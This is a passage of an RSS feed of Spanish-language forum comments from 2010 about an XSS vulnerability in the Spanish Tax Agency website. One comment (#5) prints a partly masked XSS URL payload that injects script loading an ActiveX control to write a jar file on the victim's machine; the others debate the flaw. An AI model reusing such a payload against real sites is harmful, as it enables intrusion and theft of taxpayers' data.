Leí el artículo, vi que pone el model de url para probar el XSS pero no lo pone completo, me parece una muy buena actitud (aunque obviamente hace que no podamos comprobarlo <img data-src="https://cdn.mnmstatic.net/v_149/img/menemojis/36/wink.png" alt=";)" title=";)" width="18" height="18" src="https://cdn.mnmstatic.net/v_149/img/g.gif" class="emoji lazy" /> )</p><p>&#187;&nbsp;autor: <strong>--1--</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>6776862</meneame:comment_id>
		<meneame:link_id>1018224</meneame:link_id>
		<meneame:order>5</meneame:order>
		<meneame:user>--51656--</meneame:user>
		<meneame:votes>10</meneame:votes>
		<meneame:karma>96</meneame:karma>
		<meneame:url>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos</meneame:url>
		<title>#5 Vulnerabilidad XSS en la web de la Agencia Tributaria permite robar datos fiscales</title>
		<link>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c05#c-5</link>
		<pubDate>Wed, 04 Aug 2010 12:34:42 +0000</pubDate>
		<dc:creator>--51656--</dc:creator>
		<guid>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c05#c-5</guid>
		<description><![CDATA[<p><a class="tooltip c:1018224-3" href="https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c03#c-3" rel="nofollow">#3</a> El fallo esta en la ejecucion del codigo javascript que se inyecta en la url de la AEAT.<br />
<a href="https://aeat.es/XXXXXXXXXXXXXXXXXXXXXXXXXXX=javascript:{var" title="aeat.es/XXXXXXXXXXXXXXXXXXXXXXXXXXX=javascript:{var" rel="nofollow">aeat.es/XXXXXXXXXXXXXXXXXXXXXXXXXXX=javascript:{var</a> c0d= '&#60;html&#62;&#60;body&#62;&#60;object id='ab' classid='CLSID:B785FA3C-1DE9-4D20-8396-613C486FE95E'&#62;&#60;/object&#62;&#60;script&#62;function xplit(){ab.GRABABI('c:\\AEAT\\RENTA2009\\irpf2009_false.jar','base64','ADFADFAFAFAFAFAFA');}&#60;/script&#62;&#60;a href='javascript:xplit();'&#62;exploit&#60;/a&#62;&#60;/body&#62;&#60;/html&#62;';document.write(c0d);}<br />
<br />
Te asombrarías de saber la cantidad de gente que pincha en los enlaces de un email sin tener ni idea de a donde le lleva o los datos que están enviando. También se podría conseguir lo mismo mediante script window.location.href = 'myurlxss'; <br />
Impresionante que lleven un mes sin arreglar esto..</p><p>&#187;&nbsp;autor: <strong>--51656--</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>6776844</meneame:comment_id>
		<meneame:link_id>1018224</meneame:link_id>
		<meneame:order>4</meneame:order>
		<meneame:user>cocido</meneame:user>
		<meneame:votes>7</meneame:votes>
		<meneame:karma>64</meneame:karma>
		<meneame:url>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos</meneame:url>
		<title>#4 Vulnerabilidad XSS en la web de la Agencia Tributaria permite robar datos fiscales</title>
		<link>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c04#c-4</link>
		<pubDate>Wed, 04 Aug 2010 12:32:09 +0000</pubDate>
		<dc:creator>cocido</dc:creator>
		<guid>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c04#c-4</guid>
		<description><![CDATA[<p><a class="tooltip c:1018224-3" href="https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c03#c-3" rel="nofollow">#3</a> Una vulnerabilidad XSS es una vulnerabilidad XSS. Es irrelevante el hecho de que &#34;alguien&#34; tenga que hacer clic en un enlace maligno. Si tú como desarrollador haces una web que permita el uso de este tipo de enlaces, es culpa tuya, no del que hace clic en esos enlaces.<br />
<br />
Y respecto a la otra cosa que comentas, efectivamente el autor no demuestra cómo lo hace, pero si echas un vistazo al resto del blog, verás que tiene una mínima reputación como para no dudar de lo que está afirmando.</p><p>&#187;&nbsp;autor: <strong>cocido</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>6776728</meneame:comment_id>
		<meneame:link_id>1018224</meneame:link_id>
		<meneame:order>3</meneame:order>
		<meneame:user>sam2001</meneame:user>
		<meneame:votes>4</meneame:votes>
		<meneame:karma>29</meneame:karma>
		<meneame:url>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos</meneame:url>
		<title>#3 Vulnerabilidad XSS en la web de la Agencia Tributaria permite robar datos fiscales</title>
		<link>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c03#c-3</link>
		<pubDate>Wed, 04 Aug 2010 12:15:07 +0000</pubDate>
		<dc:creator>sam2001</dc:creator>
		<guid>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c03#c-3</guid>
		<description><![CDATA[<p>No entiendo dónde está el fallo al margen de que según el artículo no se demuestra en ningún momento el poder acceder a datos fiscales en la web de la AEAT, de hecho el mismo autor dice: &#34;El escenario del ataque sería aquel donde la víctima pincha, por el medio que sea, un enlace especialmente creado. Una explotación exitosa acarrearía la posibilidad de que el atacante obtuviera acceso a los datos fiscales, facturas u otros ficheros de la víctima, pudiera modificarlos e incluso ejecutar código.&#34;<br />
<br />
Si el &#34;asunto&#34; pasa porque la víctima tenga que pinchar en un enlace creado por nosotros...</p><p>&#187;&nbsp;autor: <strong>sam2001</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>6776713</meneame:comment_id>
		<meneame:link_id>1018224</meneame:link_id>
		<meneame:order>2</meneame:order>
		<meneame:user>--198379--</meneame:user>
		<meneame:votes>9</meneame:votes>
		<meneame:karma>81</meneame:karma>
		<meneame:url>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos</meneame:url>
		<title>#2 Vulnerabilidad XSS en la web de la Agencia Tributaria permite robar datos fiscales</title>
		<link>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c02#c-2</link>
		<pubDate>Wed, 04 Aug 2010 12:13:14 +0000</pubDate>
		<dc:creator>--198379--</dc:creator>
		<guid>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c02#c-2</guid>
		<description><![CDATA[<p>[Usuario deshabilitado]</p><p>&#187;&nbsp;autor: <strong>--198379--</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>6776697</meneame:comment_id>
		<meneame:link_id>1018224</meneame:link_id>
		<meneame:order>1</meneame:order>
		<meneame:user>mencabrona</meneame:user>
		<meneame:votes>22</meneame:votes>
		<meneame:karma>172</meneame:karma>
		<meneame:url>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos</meneame:url>
		<title>#1 Vulnerabilidad XSS en la web de la Agencia Tributaria permite robar datos fiscales</title>
		<link>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c01#c-1</link>
		<pubDate>Wed, 04 Aug 2010 12:10:23 +0000</pubDate>
		<dc:creator>mencabrona</dc:creator>
		<guid>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c01#c-1</guid>
		<description><![CDATA[<p>Pero a seguir invirtiendo en macetas y rotondas que el I+D no genera beneficios.</p><p>&#187;&nbsp;autor: <strong>mencabrona</strong></p>]]></description>
	</item>

</channel>
</rss>
